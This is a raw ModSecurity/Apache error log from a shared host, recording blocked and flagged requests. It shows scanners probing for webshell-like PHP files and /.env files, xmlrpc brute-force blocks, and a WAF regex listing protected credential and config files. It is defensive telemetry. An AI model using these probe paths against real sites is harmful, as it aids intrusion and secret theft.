[Tue May 26 16:23:58.853344 2026] [security2:error] [pid 795941:tid 796137] [client 184.154.139.45:40850] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/ddpro/build/fancybox/fancybox.js"] [unique_id "ahV7xu2GQ_TLE_VHIp2VMgAAAMc"]
[Tue May 26 16:23:59.473619 2026] [security2:error] [pid 795941:tid 796133] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7xu2GQ_TLE_VHIp2VLAAAAMM"]
[Tue May 26 16:23:59.724467 2026] [security2:error] [pid 795941:tid 796093] [client 3.237.65.43:60497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahV7x-2GQ_TLE_VHIp2VYgAAAJs"], referer: www.google.com
[Tue May 26 16:24:00.636256 2026] [security2:error] [pid 795941:tid 796180] [client 172.224.240.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV7yO2GQ_TLE_VHIp2VaQAAAPI"]
[Tue May 26 16:24:01.916221 2026] [security2:error] [pid 795941:tid 796117] [client 3.237.65.43:53164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahV7ye2GQ_TLE_VHIp2VoAAAALM"], referer: www.google.com
[Tue May 26 16:24:02.385446 2026] [security2:error] [pid 795941:tid 796080] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ye2GQ_TLE_VHIp2VkQAAAI4"]
[Tue May 26 16:24:04.269935 2026] [security2:error] [pid 795941:tid 796185] [client 184.154.139.45:42654] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7zO2GQ_TLE_VHIp2V5AAAAPc"]
[Tue May 26 16:24:04.269964 2026] [security2:error] [pid 795941:tid 796185] [client 184.154.139.45:42654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7zO2GQ_TLE_VHIp2V5AAAAPc"]
[Tue May 26 16:24:04.329551 2026] [security2:error] [pid 795941:tid 796093] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7y-2GQ_TLE_VHIp2VzgAAAJs"]
[Tue May 26 16:24:05.605956 2026] [security2:error] [pid 795941:tid 796193] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ze2GQ_TLE_VHIp2V_QAAAP8"]
[Tue May 26 16:24:06.321933 2026] [security2:error] [pid 795941:tid 796093] [client 20.48.248.215:64972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV7zu2GQ_TLE_VHIp2WIQAAAJs"]
[Tue May 26 16:24:06.322107 2026] [security2:error] [pid 795941:tid 796093] [client 20.48.248.215:64972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV7zu2GQ_TLE_VHIp2WIQAAAJs"]
[Tue May 26 16:24:06.441260 2026] [security2:error] [pid 795941:tid 796165] [client 146.174.172.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ze2GQ_TLE_VHIp2WEwAAAOM"]
[Tue May 26 16:24:08.017561 2026] [security2:error] [pid 795941:tid 796164] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7z-2GQ_TLE_VHIp2WNgAAAOI"]
[Tue May 26 16:24:08.862901 2026] [security2:error] [pid 795941:tid 796157] [client 20.48.248.215:64427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/adminfuns.php"] [unique_id "ahV70O2GQ_TLE_VHIp2WVwAAANs"]
[Tue May 26 16:24:08.863028 2026] [security2:error] [pid 795941:tid 796157] [client 20.48.248.215:64427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/adminfuns.php"] [unique_id "ahV70O2GQ_TLE_VHIp2WVwAAANs"]
[Tue May 26 16:24:09.327141 2026] [security2:error] [pid 795941:tid 796090] [client 184.154.139.45:44228] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261070/et-core-unified-deferred-261070.min.css"] [unique_id "ahV70e2GQ_TLE_VHIp2WcAAAAJg"]
[Tue May 26 16:24:09.718560 2026] [security2:error] [pid 795941:tid 796197] [client 184.154.139.45:44368] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261070/et-divi-dynamic-261070-late.css"] [unique_id "ahV70e2GQ_TLE_VHIp2WeAAAAQM"]
[Tue May 26 16:24:10.010763 2026] [security2:error] [pid 795941:tid 796149] [client 20.48.248.215:64997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/sx_pms.php"] [unique_id "ahV70u2GQ_TLE_VHIp2WhQAAANM"]
[Tue May 26 16:24:10.010871 2026] [security2:error] [pid 795941:tid 796149] [client 20.48.248.215:64997] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/sx_pms.php"] [unique_id "ahV70u2GQ_TLE_VHIp2WhQAAANM"]
[Tue May 26 16:24:10.153048 2026] [security2:error] [pid 795941:tid 796119] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV70e2GQ_TLE_VHIp2WdAAAALU"]
[Tue May 26 16:24:10.743918 2026] [security2:error] [pid 795941:tid 796099] [client 184.154.139.45:44780] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261091/et-divi-dynamic-261091.css"] [unique_id "ahV70u2GQ_TLE_VHIp2WlQAAAKE"]
[Tue May 26 16:24:11.170978 2026] [security2:error] [pid 795941:tid 796098] [client 20.48.248.215:64331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-info.php"] [unique_id "ahV70-2GQ_TLE_VHIp2WogAAAKA"]
[Tue May 26 16:24:11.171083 2026] [security2:error] [pid 795941:tid 796098] [client 20.48.248.215:64331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-info.php"] [unique_id "ahV70-2GQ_TLE_VHIp2WogAAAKA"]
[Tue May 26 16:24:11.337660 2026] [security2:error] [pid 795941:tid 796097] [client 184.154.139.45:44966] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV70-2GQ_TLE_VHIp2WowAAAJ8"]
[Tue May 26 16:24:12.066889 2026] [security2:error] [pid 795941:tid 796173] [client 20.48.248.215:64984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-test.php"] [unique_id "ahV71O2GQ_TLE_VHIp2WwAAAAOs"]
[Tue May 26 16:24:12.067023 2026] [security2:error] [pid 795941:tid 796173] [client 20.48.248.215:64984] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-test.php"] [unique_id "ahV71O2GQ_TLE_VHIp2WwAAAAOs"]
[Tue May 26 16:24:12.689423 2026] [security2:error] [pid 795941:tid 796174] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV70-2GQ_TLE_VHIp2WsAAAAOw"]
[Tue May 26 16:24:13.504043 2026] [security2:error] [pid 795941:tid 796122] [client 216.73.217.138:11651] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV71O2GQ_TLE_VHIp2W1QAAuCI"]
[Tue May 26 16:24:13.504972 2026] [security2:error] [pid 795941:tid 796122] [client 216.73.217.138:11651] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV71O2GQ_TLE_VHIp2W1gAAuBU"]
[Tue May 26 16:24:14.554332 2026] [security2:error] [pid 795941:tid 796156] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV71e2GQ_TLE_VHIp2W4gAAANo"]
[Tue May 26 16:24:14.840942 2026] [security2:error] [pid 795941:tid 796148] [client 20.48.248.215:64381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/asd67.php"] [unique_id "ahV71u2GQ_TLE_VHIp2XBwAAANI"]
[Tue May 26 16:24:14.842719 2026] [security2:error] [pid 795941:tid 796148] [client 20.48.248.215:64381] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/asd67.php"] [unique_id "ahV71u2GQ_TLE_VHIp2XBwAAANI"]
[Tue May 26 16:24:15.779918 2026] [security2:error] [pid 795941:tid 796109] [client 216.73.217.138:11651] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV71-2GQ_TLE_VHIp2XDwAAqys"]
[Tue May 26 16:24:16.185565 2026] [security2:error] [pid 795941:tid 796104] [client 20.48.248.215:63701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/Cap.php"] [unique_id "ahV72O2GQ_TLE_VHIp2XJQAAAKY"]
[Tue May 26 16:24:16.185680 2026] [security2:error] [pid 795941:tid 796104] [client 20.48.248.215:63701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/Cap.php"] [unique_id "ahV72O2GQ_TLE_VHIp2XJQAAAKY"]
[Tue May 26 16:24:16.618566 2026] [security2:error] [pid 795941:tid 796102] [client 184.154.139.45:46656] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV72O2GQ_TLE_VHIp2XMQAAAKQ"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:24:18.100318 2026] [security2:error] [pid 795941:tid 796122] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV71-2GQ_TLE_VHIp2XHQAAALg"]
[Tue May 26 16:24:19.113716 2026] [security2:error] [pid 795941:tid 796110] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV72e2GQ_TLE_VHIp2XQAAAAKw"]
[Tue May 26 16:24:19.737162 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:63803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/like.php"] [unique_id "ahV72-2GQ_TLE_VHIp2XbAAAAK0"]
[Tue May 26 16:24:19.737281 2026] [security2:error] [pid 795941:tid 796111] [client 20.48.248.215:63803] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/like.php"] [unique_id "ahV72-2GQ_TLE_VHIp2XbAAAAK0"]
[Tue May 26 16:24:21.122034 2026] [security2:error] [pid 795941:tid 796123] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV72-2GQ_TLE_VHIp2XYgAAALk"]
[Tue May 26 16:24:21.381495 2026] [security2:error] [pid 795941:tid 796088] [client 184.154.139.45:48542] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV73e2GQ_TLE_VHIp2XhwAAAJY"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:24:22.534075 2026] [security2:error] [pid 795941:tid 796165] [client 20.48.248.215:65031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/we.php"] [unique_id "ahV73u2GQ_TLE_VHIp2XowAAAOM"]
[Tue May 26 16:24:22.534159 2026] [security2:error] [pid 795941:tid 796165] [client 20.48.248.215:65031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/we.php"] [unique_id "ahV73u2GQ_TLE_VHIp2XowAAAOM"]
[Tue May 26 16:24:22.544487 2026] [security2:error] [pid 795941:tid 796183] [client 176.65.139.236:50842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.valodico.onesoft.in"] [uri "/.env"] [unique_id "ahV73u2GQ_TLE_VHIp2XpAAAAPU"]
[Tue May 26 16:24:22.562175 2026] [security2:error] [pid 795941:tid 795947] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV73u2GQ_TLE_VHIp2XpQAA7QU"]
[Tue May 26 16:24:22.562351 2026] [security2:error] [pid 795941:tid 796175] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV73u2GQ_TLE_VHIp2XpQAA7QU"]
[Tue May 26 16:24:22.851937 2026] [security2:error] [pid 795941:tid 796139] [client 176.65.139.232:27738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "valodico.com"] [uri "/.env"] [unique_id "ahV73u2GQ_TLE_VHIp2XrAAAAMk"]
[Tue May 26 16:24:22.856770 2026] [security2:error] [pid 795941:tid 796097] [client 176.65.139.239:37980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.env"] [unique_id "ahV73u2GQ_TLE_VHIp2XrQAAAJ8"]
[Tue May 26 16:24:23.307871 2026] [security2:error] [pid 795941:tid 796181] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV73e2GQ_TLE_VHIp2XiwAAAPM"]
[Tue May 26 16:24:23.996130 2026] [autoindex:error] [pid 795941:tid 796076] [client 107.175.158.115:35036] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:24:24.261220 2026] [autoindex:error] [pid 795941:tid 796083] [client 107.175.158.115:53388] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:24:25.346019 2026] [security2:error] [pid 795941:tid 796091] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV73-2GQ_TLE_VHIp2XwAAAAJk"]
[Tue May 26 16:24:25.676849 2026] [security2:error] [pid 795941:tid 796085] [client 176.65.139.238:42872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/.env"] [unique_id "ahV74e2GQ_TLE_VHIp2X3AAAAJM"]
[Tue May 26 16:24:26.058070 2026] [security2:error] [pid 795941:tid 796137] [client 20.48.248.215:63780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp.php"] [unique_id "ahV74u2GQ_TLE_VHIp2X5AAAAMc"]
[Tue May 26 16:24:26.058187 2026] [security2:error] [pid 795941:tid 796137] [client 20.48.248.215:63780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp.php"] [unique_id "ahV74u2GQ_TLE_VHIp2X5AAAAMc"]
[Tue May 26 16:24:26.936196 2026] [security2:error] [pid 795941:tid 796164] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV74e2GQ_TLE_VHIp2X3wAAAOI"]
[Tue May 26 16:24:27.083605 2026] [security2:error] [pid 795941:tid 796083] [client 20.48.248.215:64348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/wp-indx.php"] [unique_id "ahV74-2GQ_TLE_VHIp2X-AAAAJE"]
[Tue May 26 16:24:27.083776 2026] [security2:error] [pid 795941:tid 796083] [client 20.48.248.215:64348] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/wp-indx.php"] [unique_id "ahV74-2GQ_TLE_VHIp2X-AAAAJE"]
[Tue May 26 16:24:27.488037 2026] [autoindex:error] [pid 795941:tid 796165] [client 107.175.158.115:53388] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:24:27.863994 2026] [security2:error] [pid 795941:tid 796162] [client 162.211.125.8:25652] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV74-2GQ_TLE_VHIp2YEAAAAOA"]
[Tue May 26 16:24:28.140948 2026] [security2:error] [pid 795941:tid 796135] [client 162.211.125.8:25660] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahV75O2GQ_TLE_VHIp2YEwAAAMU"]
